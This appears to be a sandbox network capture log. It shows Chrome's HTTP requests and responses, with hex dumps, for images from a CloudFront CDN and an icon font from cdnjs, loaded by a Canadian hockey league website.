                                                                                                                          2025-01-13 21:01:17 UTC3476INData Raw: 69 c2 ab 35 c9 97 81 c7 54 36 12 d8 fc 0c 15 15 09 ae e6 95 3c e2 4e e8 96 79 63 e2 10 4c 53 7c 27 d0 05 a7 c3 dd 8f 49 5a 39 5d 5d 31 13 8e 83 d7 9d e5 17 0e 7f bc 22 59 aa b7 a4 ad 9b 61 dc 57 14 db c1 0d 53 e9 33 4f 92 4f 8f 74 a0 91 f3 24 0f 9c 30 ca 81 a9 2e d4 df 2e 4c 3a b5 ee 54 e2 94 77 f1 2a 27 f1 8b 03 86 99 15 54 f5 d6 c4 95 1f ff 00 9c 96 59 f8 25 5c df 94 56 13 2f 29 6b cb 80 67 62 40 f3 f1 8b c7 82 9a 7a 6a 5c 44 da ee 7d 59 35 4c 4d 90 7f 71 95 60 fd a6 2a ea 98 c2 26 7b 50 26 3d a2 cb b1 58 04 e0 d6 66 57 f6 4b e3 f3 88 d7 66 d3 37 01 9a bb 65 13 24 ef e8 15 35 2e e3 b3 47 64 22 64 12 12 81 e6 a2 82 4f a0 02 24 5d a3 2a 45 52 d4 b2 24 99 e5 2f aa b4 b6 db cf ef b5 cb f8 e2 0a 1d 15 d2 7a 26 94 69 bd 1e cc a5 f2 04 4b b2 1d 9b 7f 1e f4 cc
                                                                                                                          Data Ascii: i5T6<NycLS|'IZ9]]1"YaWS3OOt$0..L:Tw*'TY%\V/)kgb@zj\D}Y5LMq`*&{P&=XfWKf7e$5.Gd"dO$]*ER$/z&iK


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          49192.168.11.204985354.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:16 UTC679OUTGET /app/uploads/gthl/2025/01/06103844/DECA-Title-1600x900-GTHL-Power-Rankings-730x411.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:17 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 27788
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:17 GMT
                                                                                                                          Last-Modified: Mon, 06 Jan 2025 15:38:46 GMT
                                                                                                                          ETag: "23a35e3dc32ba6651058dc1bb5411c18"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 f762d56afc88f7f52f51da3b63ad4658.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: UdZUCzhHJ8t5zvblvXiknpa3mD7IrgOsddtfGgdUVTzO8DdY8_zwGw==
                                                                                                                          2025-01-13 21:01:17 UTC15897INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 02 00 26 00 26 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 01 9b 02 da 03 01 22 00 02 11 01 03 11 01 ff c4 00 1e 00 01 00 02 02 03 01 01 01 00 00 00 00 00 00 00 00 00 01 02 04 06 05 07 08 03 09 0a ff c4 00 5a 10 00 01 03 02 03 04 03 09 09 0b 07 0b 04 03 01 00 00 01 02 03 04 05 06 11 31 07 12 21 51 08 13 41 14 16 22 57 61 71 92 93 e1
                                                                                                                          Data Ascii: JFIF&&CC"Z1!QA"Waq
                                                                                                                          2025-01-13 21:01:17 UTC93INData Raw: fe d9 1c e7 fc e4 7e ab fb d1 db 3b 04 b8 db e9 ad 17 1a 5a 8a e8 22 99 f5 28 f6 c6 f9 11 1c ad 46 26 6a 88 bc 72 37 5c 73 57 4b 36 1a ab 64 35 31 3d db 8e 5c 9a f4 55 f8 aa 79 86 0a aa 9a 39 7a ea 59 e4 86 4c b2 de 63 95 ab 97 9d 0c 87 5f 2f 4f 6a b1 f7 6a b7 35 c9 92 a2 cc ec
                                                                                                                          Data Ascii: ~;Z"(F&jr7\sWK6d51=\Uy9zYLc_/Ojj5
                                                                                                                          2025-01-13 21:01:17 UTC1555INData Raw: 95 3e 73 c4 62 b4 7b 97 c6 3c 5c 67 6b b4 ed 6e 83 ed 59 37 85 15 96 e4 31 c9 6a 61 ef 68 b8 eb 27 c1 dd de de b3 05 34 00 1e 90 f9 09 dd 9b 1f da 45 ae 1b 54 38 52 f5 3a 53 4d 4e ae 4a 69 5f c1 8f 6a ae 7b aa bd 8a 8a ab e7 3b 61 b5 94 52 b7 c1 a9 85 e8 bf d7 45 3c 76 67 53 df 6f 34 ad 46 53 dd 2a a3 6a 68 89 2a e4 79 6c c3 46 61 8a ac eb 51 9e ab 7b 5a e1 73 ec fa 31 e1 7f 13 93 60 61 80 c7 51 e5 63 04 94 64 9d 9e aa d8 93 e0 ec b6 5f 66 cd fd 27 ad 9d 5b 45 13 7c 2a a8 5a 89 fd 74 34 fc 7b 8d 2d 76 eb 4c ad 6d 43 57 86 79 e7 f1 d5 34 6b 79 f1 3c fe ec 4f 88 9e 99 3a f5 57 97 e9 15 0e 36 7a 9a 9a a7 f5 95 33 c9 2b b9 bd ca e5 fa 4c 18 5d 15 54 aa 29 d5 9d d2 e8 3a 39 bf 86 89 e3 30 b3 a1 83 c3 ea b9 2b 5d bd de c3 60 d9 f5 e5 b6 8c 6f 6c b9 d4 4a d8 e3
                                                                                                                          Data Ascii: >sb{<\gknY71jah'4ET8R:SMNJi_j{;aRE<vgSo4FS*jh*ylFaQ{Zs1`aQcd_f'[E|*Zt4{-vLmCWy4ky<O:W6z3+L]T):90+]`olJ
                                                                                                                          2025-01-13 21:01:17 UTC10243INData Raw: 4b e5 70 95 af c3 a5 23 d0 3b 64 a9 a7 a8 c2 53 f5 13 c7 26 eb 57 3d d7 22 e5 c5 a6 9f b0 dc 73 05 b2 69 b0 b5 de ad 91 53 4c ab 35 2b e5 72 35 ad 93 f1 99 9a f3 d5 3c a9 e5 3a be 6b c5 da a2 27 43 51 73 aa 92 37 f0 73 1f 2b 95 17 ce 99 98 88 aa 8b 9a 2e 4a 86 fd 1c 96 30 c1 4b 07 52 57 bb bd fa 0f 31 98 f8 45 ad 5f 48 69 67 f8 4a 7a ae 31 d5 71 6f 64 96 db a7 e9 5e c7 b4 f6 15 55 c2 81 d4 b3 35 b5 b0 2a ac 6e 44 4e b1 39 1d 59 b2 db 85 0d 16 3a c4 d1 d6 56 41 03 a6 58 db 1a 49 22 35 5e a8 ab 9a 26 7a 9d 3d ef f5 f3 f3 c5 6f af 77 f1 31 fb ae af ba 7b b3 ba 65 ee 8c f7 ba dd f5 df cf 9e 7a 9a 98 7d 1e 74 69 54 a4 e7 f2 d7 47 43 b9 da cd 7c 2b c7 1f 8e c2 63 61 86 b3 a1 26 ec de f4 e2 e2 fe f3 d6 77 ca ea 29 6d 55 11 c7 57 0b 9c ad e0 88 f4 55 5e 28 74 16
                                                                                                                          Data Ascii: Kp#;dS&W="siSL5+r5<:k'CQs7s+.J0KRW1E_HigJz1qod^U5*nDN9Y:VAXI"5^&z=ow1{ez}tiTGC|+ca&w)mUWU^(t


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          50192.168.11.204985254.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:16 UTC680OUTGET /app/uploads/gthl/2025/01/06205151/DECAA-Title-1600x900-GTHL-Power-Rankings-730x411.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:17 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 28149
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:17 GMT
                                                                                                                          Last-Modified: Tue, 07 Jan 2025 01:51:52 GMT
                                                                                                                          ETag: "5cd3006547a71f04f0591c3cdf4f23e2"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 6a615842cf9e2c637f2872ee9b70eb72.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: jaxyygZ332Pq_RdWRLwMKEmv3Nyst6sH4YP5hSyOsXD1PJQerNsu5A==
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 02 00 26 00 26 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 01 9b 02 da 03 01 22 00 02 11 01 03 11 01 ff c4 00 1e 00 01 00 02 02 03 01 01 01 00 00 00 00 00 00 00 00 00 01 02 04 06 05 07 08 03 09 0a ff c4 00 5a 10 00 01 03 02 03 04 03 09 09 0b 07 0b 04 03 01 00 00 01 02 03 04 05 06 11 31 07 12 21 51 08 13 41 14 16 22 57 61 71 92 93 e1
                                                                                                                          Data Ascii: JFIF&&CC"Z1!QA"Waq
                                                                                                                          2025-01-13 21:01:17 UTC627INData Raw: 97 a9 d2 9a 6a 75 72 53 4a fe 0c 7b 55 73 dd 55 ec 54 55 5f 39 db 0d ac a2 95 be 0d 4c 2f 45 fe ba 29 e3 b3 3a 9e fb 79 a5 6a 32 9e e9 55 1b 53 44 49 57 23 cb 66 1a 33 0c 55 67 5a 8c f5 5b da d7 0b 9f 67 d1 8f 0b f8 9c 9b 03 0c 06 3a 8f 2b 18 24 a3 24 ec f5 56 c4 9f 07 65 b2 fb 36 6f e9 3d 6c ea da 28 9b e1 55 42 d4 4f eb a1 a7 e3 dc 69 6b b7 5a 65 6b 6a 1a bc 33 cf 3f 8e a9 a3 5b cf 89 e7 f7 62 7c 44 f4 c9 d7 aa bc bf 48 a8 71 b3 d4 d4 d5 3f ac a9 9e 49 5d cd ee 57 2f d2 60 c2 e8 aa a5 51 4e ac ee 97 41 d1 cd fc 34 4f 19 85 9d 0c 1e 1f 55 c9 5a ed ee f6 1b 06 cf af 2d b4 63 7b 65 ce a2 56 c7 1a d4 6e ca f7 2e 48 8d 7e 6d 55 55 e5 c4 f4 fc 77 4b 64 ac 6c 91 5c 29 9e c7 26 6d 73 65 6a a2 a7 34 e2 78 f0 cc 8e f5 78 86 36 c5 15 d2 ad 8c 62 64 d6 b6 67 22 22
                                                                                                                          Data Ascii: jurSJ{UsUTU_9L/E):yj2USDIW#f3UgZ[g:+$$Ve6o=l(UBOikZekj3?[b|DHq?I]W/`QNA4OUZ-c{eVn.H~mUUwKdl\)&msej4xx6bdg""
                                                                                                                          2025-01-13 21:01:17 UTC546INData Raw: 2c 17 75 7d 3c 4d 92 ad 16 6a 85 72 23 55 1a d6 a6 6a ed 38 1d 3e 97 fb e6 7f 86 2b 7d 7b bf 89 8f 57 70 af ae dd 4a da c9 a7 46 67 bb d6 3d 5d 97 9b 33 2e 0b 47 65 84 a8 e5 ca 5d 34 d3 f5 a3 4f 48 7c 2c 53 cf 30 d0 a2 b0 b6 94 27 09 a6 dd f6 c6 49 f4 71 dd b3 a4 f5 fb 2e 76 d7 b5 1e ca fa 77 35 c9 9a 2a 4a d5 45 4f 9c f3 e6 31 bc be c5 b4 da 6b d4 0e fb d9 f1 c8 b9 7e 33 77 97 34 f9 53 33 49 65 f6 f4 c6 a3 19 76 ac 6b 5a 99 22 24 ce 44 44 f9 cc 79 ea aa 6b 25 eb aa ea 24 9a 4c b2 de 91 ca e5 cb ce a6 6c bb 21 f8 0c e5 29 4b 59 34 d5 bd 26 86 96 f8 4d 7a 49 86 a5 4e 95 17 4e 74 e6 a6 9d ef b5 7e e7 af 69 6f 76 7a d8 19 53 4b 73 a5 96 29 13 36 b9 b2 b5 51 7e 93 cf 9b 63 b1 c3 6d c4 ee b8 51 ab 1d 4f 5c 9b f9 b1 73 44 7a 6a 9c 3e 43 4c a7 ba dc e9 22 48 69
                                                                                                                          Data Ascii: ,u}<Mjr#Uj8>+}{WpJFg=]3.Ge]4OH|,S0'Iq.vw5*JEO1k~3w4S3IevkZ"$DDyk%$Ll!)KY4&MzINNt~iovzSKs)6Q~cmQO\sDzj>CL"Hi
                                                                                                                          2025-01-13 21:01:17 UTC10592INData Raw: 78 29 9f 15 f9 8d 9a 86 b6 cd 0d 1c 10 d1 d7 d2 ac 11 c6 d6 46 ad 95 aa 8a d4 4c 93 2e 27 93 56 ff 00 7c 5d 6f 15 9e bd df c4 86 5f 2f 31 b1 23 8e eb 56 d6 b5 32 44 49 9c 88 89 f3 9a 92 d1 ba 93 a5 1a 2e ae c4 db 5b 3a 7f f4 77 a8 f8 5e c2 50 c7 54 c7 c3 05 f1 ea 46 31 93 d6 f2 6f 6e 1d 6e fe a3 b8 76 89 b4 fb be 1d bb b6 9a d5 23 5e d9 11 ce c9 5c b9 23 51 72 4c b2 e7 92 98 78 17 6c b7 2b 86 24 a6 a0 c4 32 d3 c3 47 3a 39 8e 95 cf c9 18 ec b3 6a aa af 04 e2 99 7c a7 50 d4 d5 d5 56 49 d6 d5 d4 49 33 f2 cb 7a 47 2b 97 2e 59 a9 f2 3a 70 c8 f0 ab 0f c8 ca 2b 5a d6 bf 1f 49 e3 ab f8 49 ce 5e 69 f0 ea 35 64 a9 eb 29 72 6d ec b2 df 17 d4 ff 00 13 d8 55 35 76 ca ba 59 20 75 75 3a b6 56 2b 7f d2 27 6a 1a 96 cc 9d 6e b1 db 2b ec 92 d7 53 b2 68 ae 13 48 91 2c ad 47
                                                                                                                          Data Ascii: x)FL.'V|]o_/1#V2DI.[:w^PTF1onnv#^\#QrLxl+$2G:9j|PVII3zG+.Y:p+ZII^i5d)rmU5vY uu:V+'jn+ShH,G


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          51192.168.11.2049854104.17.25.144431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:16 UTC732OUTGET /ajax/libs/material-design-iconic-font/2.1.2/fonts/Material-Design-Iconic-Font.woff2?v=2.1.0 HTTP/1.1
                                                                                                                          Host: cdnjs.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          Origin: https://gthlcanada.com
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: font
                                                                                                                          Referer: https://cdnjs.cloudflare.com/ajax/libs/material-design-iconic-font/2.1.2/css/material-design-iconic-font.min.css
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:17 UTC965INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:17 GMT
                                                                                                                          Content-Type: application/octet-stream; charset=utf-8
                                                                                                                          Content-Length: 38812
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Cache-Control: public, max-age=30672000
                                                                                                                          ETag: "5eb03ed9-979c"
                                                                                                                          Last-Modified: Mon, 04 May 2020 16:12:09 GMT
                                                                                                                          cf-cdnjs-via: cfworker/kv
                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                          Timing-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          CF-Cache-Status: MISS
                                                                                                                          Expires: Sat, 03 Jan 2026 21:01:17 GMT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uX10AkMrHsgZtbgR9oTgJlA5n59n6RwgJl3jB%2BQUaTnfQ%2BOXA7CuBkJGYmoTe6t33ny8qTZJWDX5tbHqYlCdDIOeOZIR4YxDy3sCeKT1QkrFZv%2FPeTiEB3ldNrZR0q1re%2FnG6oWj"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Strict-Transport-Security: max-age=15780000
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 901852155988d658-IAD
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2025-01-13 21:01:17 UTC404INData Raw: 77 4f 46 32 00 01 00 00 00 00 97 9c 00 10 00 00 00 01 96 10 00 00 97 3a 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3f 46 46 54 4d 1c 1a 1e 06 60 00 82 42 08 0c 09 97 17 11 08 0a 85 aa 50 84 92 32 01 36 02 24 03 97 2a 0b 8b 58 00 04 20 05 84 70 07 ba 38 0c 7f 5b 03 43 71 a6 d8 79 9f 88 31 dd 86 00 ff d5 9c b6 56 71 88 12 d9 dc 41 6d e9 cd 12 c2 ee 5e f3 ba 02 ee fa 1e 07 10 d9 bb cf fe ff ff ff 0d 09 42 46 6c db 80 1b 3f 78 c1 7f 5f b5 2a ab 2a 41 1c af a8 25 08 96 16 4d 75 e5 d2 fb da d4 29 c6 34 5c 42 4d 71 15 ca c5 cf 7a 43 b6 d9 11 74 50 05 5d 35 1a 0d ca 65 93 6a d7 4c fb c5 1a e5 93 63 60 1e b9 77 7d d5 c8 8d aa 11 07 8d 41 22 b9 c2 be 63 dd 31 1d 13 4c b0 20 01 41 51 40 90 ec 1c ee aa 31 49 98 e6 03 79 c1 e0 c0 3a 5e 39
                                                                                                                          Data Ascii: wOF2:?FFTM`BP26$*X p8[Cqy1VqAm^BFl?x_**A%Mu)4\BMqzCtP]5ejLc`w}A"c1L AQ@1Iy:^9
                                                                                                                          2025-01-13 21:01:17 UTC1369INData Raw: 67 92 c7 f3 cf 64 32 c0 bb ad 7f a8 c0 e3 c1 03 de 63 8b 83 a5 e2 7b b8 c1 9d a0 a0 e8 06 05 dc 39 52 4b cc 72 a6 96 05 65 19 8d 65 58 5a 77 d5 d5 d5 25 b6 fc 79 53 ef b4 79 95 b6 2e bd 4d 37 5b de 65 b7 d6 0f e8 1f 6d ff b3 a2 04 4f 73 c2 45 2c db e1 8b 65 9f 80 ff ef 09 9a 7d 56 d4 14 f5 76 d5 64 71 ff fb 9a 56 7f ae 72 56 f7 66 7e 74 b9 91 64 a9 11 6c b9 11 6c f9 82 ad dc 94 9c d5 ad cd 36 73 9b 2f 66 67 49 4d 54 d4 c8 ee 61 32 f4 4c 7d 82 81 ed c6 de 91 80 ff 7a dd 2f 2f 88 ca ce e6 cb 9e a2 c6 2e d2 aa 45 a7 87 ba 23 00 2c 36 77 df 20 d6 79 48 a2 c6 3c 06 12 58 ff 5f 85 63 84 bc 57 ea b4 c8 62 1b 03 24 99 d9 b6 d2 49 f7 79 2e fc 97 aa ff 55 33 38 68 5c 80 2d b0 45 42 14 a4 d1 d7 33 63 fc 3a 1f cd 86 ce 25 f9 26 c9 ea 7f 53 f4 f4 cc be 7c 30 09 c0 7d
                                                                                                                          Data Ascii: gd2c{9RKreeXZw%ySy.M7[emOsE,e}VvdqVrVf~tdll6s/fgIMTa2L}z//.E#,6w yH<X_cWb$Iy.U38h\-EB3c:%&S|0}
                                                                                                                          2025-01-13 21:01:17 UTC1369INData Raw: 16 b0 f0 f6 28 55 de 4e f2 55 8c 9d fd 08 58 79 bb 9f de 1e d6 10 e7 df ae b0 6f 6a a3 62 a1 cd b1 c3 bc e6 87 aa 88 39 32 10 cc 63 35 5c cc c6 4a d0 ba 09 c9 f7 52 35 9c 02 f7 38 d8 16 f6 b9 cb d0 1b 54 dd 9d ae 0d e2 4b cc 3f 45 46 1e 44 cc 55 8f 39 e2 09 3b 4d 62 bd 1f 2a b2 33 36 81 04 4e 46 92 bb e9 0f d8 d9 aa bd bc dd 51 c2 6c 51 53 f4 16 d1 19 28 a3 0a 54 fd b6 2c 6e f7 e6 b9 88 c3 87 7f db f8 85 ef e1 ae e4 80 83 8a 95 3b 01 27 95 32 b8 12 83 3b 49 f0 24 0e 6f 92 e1 4b 2a f8 93 1a 81 a4 41 30 69 df c9 a2 06 fa 0a e4 0e f8 6d e4 f1 f7 a2 43 6c 91 87 7a 16 b6 7d 8b 30 8a 28 10 22 06 84 88 03 21 12 40 88 24 10 22 05 84 48 03 21 32 40 e8 16 50 3b cd 50 bc 5c b0 94 ea ac a8 ce 16 5b 54 52 f0 b5 7f a3 40 31 28 0e 03 2f 48 73 39 61 cb fa 87 16 c2 26 6f
                                                                                                                          Data Ascii: (UNUXyojb92c5\JR58TK?EFDU9;Mb*36NFQlQS(T,n;'2;I$oK*A0imClz}0("!@$"H!2@P;P\[TR@1(/Hs9a&o
                                                                                                                          2025-01-13 21:01:17 UTC1369INData Raw: 2e e7 3d 9e 50 07 11 ef 06 d1 6b 78 6b 54 b2 8d 21 51 09 14 70 da df ca b6 a6 04 47 ba a2 76 22 b7 95 b0 e8 61 4d da 99 b7 09 5c 4e 0d 68 4d 40 51 aa 56 a0 67 80 6c df c8 fe a0 14 4a bb b7 05 a6 f5 ef d0 0f 55 39 9f 5e 95 dc b2 0e 7d b6 68 b9 59 59 ba 87 6b ed 89 9e 73 77 c9 89 1c 54 ed 1c ad 9c 55 ab 36 ad 79 dd 14 65 b1 fd 13 0b 74 10 79 35 6b 0a 42 4f 66 45 53 b2 65 b1 c3 7c 03 78 0d fa e5 6b 6b f1 44 85 b7 a7 36 9b 65 af 4e ec 6d da d5 fa 8b 3f 8b 9d 19 e3 ac 22 7d 2e 24 01 4c 18 1d f1 93 e2 11 7e ee 6b df 9c 15 bb 9e 56 9d d7 18 1f 24 f2 6c 2c b7 05 ed ed 2e 45 5f f7 4d 15 16 c5 6f 7e a3 66 ad de 92 bc 32 3f e8 a1 3a 01 53 92 d4 2e 54 c9 ea bb b9 37 3a 87 a6 9b d5 a0 84 7c 02 80 6e 8b 23 6c f5 55 d2 3a b9 5e 99 8f 26 39 24 7e 24 e9 66 64 bd 74 08 85
                                                                                                                          Data Ascii: .=PkxkT!QpGv"aM\NhM@QVglJU9^}hYYkswTU6yety5kBOfESe|xkkD6eNm?"}.$L~kV$l,.E_Mo~f2?:S.T7:|n#lU:^&9$~$fdt
                                                                                                                          2025-01-13 21:01:17 UTC1369INData Raw: 42 91 37 47 1a e9 03 98 27 55 44 e5 f2 6e 3e 6e 11 93 fb 7f 7d 41 33 f7 4f ed 81 5e 38 9c 24 a0 53 45 95 dd 03 26 9f 21 89 a7 97 c6 13 9a eb 93 d6 96 a4 90 c0 e6 ab a7 3c 93 e6 95 6f 40 18 db 48 11 7b 16 d5 2c ad e7 d8 b7 d8 81 19 31 a9 24 ef 3e 47 70 7b 72 fd 84 16 0d 39 b5 01 f2 92 cf 3e 69 0e 49 c3 c9 88 69 af 98 5a 9c cc 6d 69 10 df 01 be 44 78 c6 45 6e 78 ec 11 da 2c 5c ef 45 72 65 8d e4 ea 94 5b 67 dc 89 72 e4 8f 31 04 37 b7 e6 cd 94 e1 23 55 a7 2a 27 0f 63 6e f0 35 f0 14 22 60 d4 dc ce e8 d4 fd f6 61 0f 23 99 21 5c 37 50 23 2a 2f e4 4a c5 39 bc ac f9 c2 6c 27 29 5b 66 21 a2 66 ed de 2f d2 8d 5f bd 0b a9 f3 30 b6 b0 83 3d a7 6f dd 72 b9 10 66 6a 46 39 ce e8 1e bf 0a 6f dd 33 05 f4 34 49 8e 70 cd ac 3e 4e 52 2c 16 fa 17 cc a4 2c 48 ed ea 42 69 d6 84
                                                                                                                          Data Ascii: B7G'UDn>n}A3O^8$SE&!<o@H{,1$>Gp{r9>iIiZmiDxEnx,\Ere[gr17#U*'cn5"`a#!\7P#*/J9l')[f!f/_0=orfjF9o34Ip>NR,,HBi
                                                                                                                          2025-01-13 21:01:17 UTC1369INData Raw: f4 e1 bb 2f 28 ef 3c 4f 2e ca f2 bc 36 81 eb 2a fd f0 83 f7 5e 44 97 66 6e 5f 4f 7f d6 14 be c0 5e 40 4a e1 3a 48 d2 df dc 84 cf 33 79 21 ea 6e 08 62 5b b1 f3 e6 3c 13 c6 44 4c a6 50 36 03 4d 06 1f 80 6c 22 a4 40 1d 49 1d fe 1a 49 a6 d6 43 f0 4a dd a1 7d 34 60 93 c4 b5 97 71 ee cc b7 a4 3e b3 80 7a 69 60 52 0f 26 0e 33 08 5d 13 a8 8d ec 03 15 f1 88 aa 1a 1d 20 de 03 f6 2f e6 50 1f 69 db c6 50 65 69 07 61 ca c1 d9 ae 0a 59 01 52 03 72 2a 6d a3 b9 92 0c fd 78 28 10 0f 62 dc f1 31 df 98 2f 59 41 40 bf d6 d0 6e 92 d0 72 99 94 01 4e d6 3c 86 35 f0 5c e0 9c bd cf 18 bf a7 1c e2 c6 88 a2 5d bd 4e a3 ea 48 77 e1 1b ec 85 6f a3 fb b0 e3 12 97 cc 94 fc 1d 30 37 ac 3c de 0b db 0d af 56 26 7f ba db 16 0b 4e 47 27 d3 6f f6 2a d6 52 97 5f 84 c1 30 7d b5 70 4f fe ae 31
                                                                                                                          Data Ascii: /(<O.6*^Dfn_O^@J:H3y!nb[<DLP6Ml"@IICJ}4`q>zi`R&3] /PiPeiaYRr*mx(b1/YA@nrN<5\]NHwo07<V&NG'o*R_0}pO1
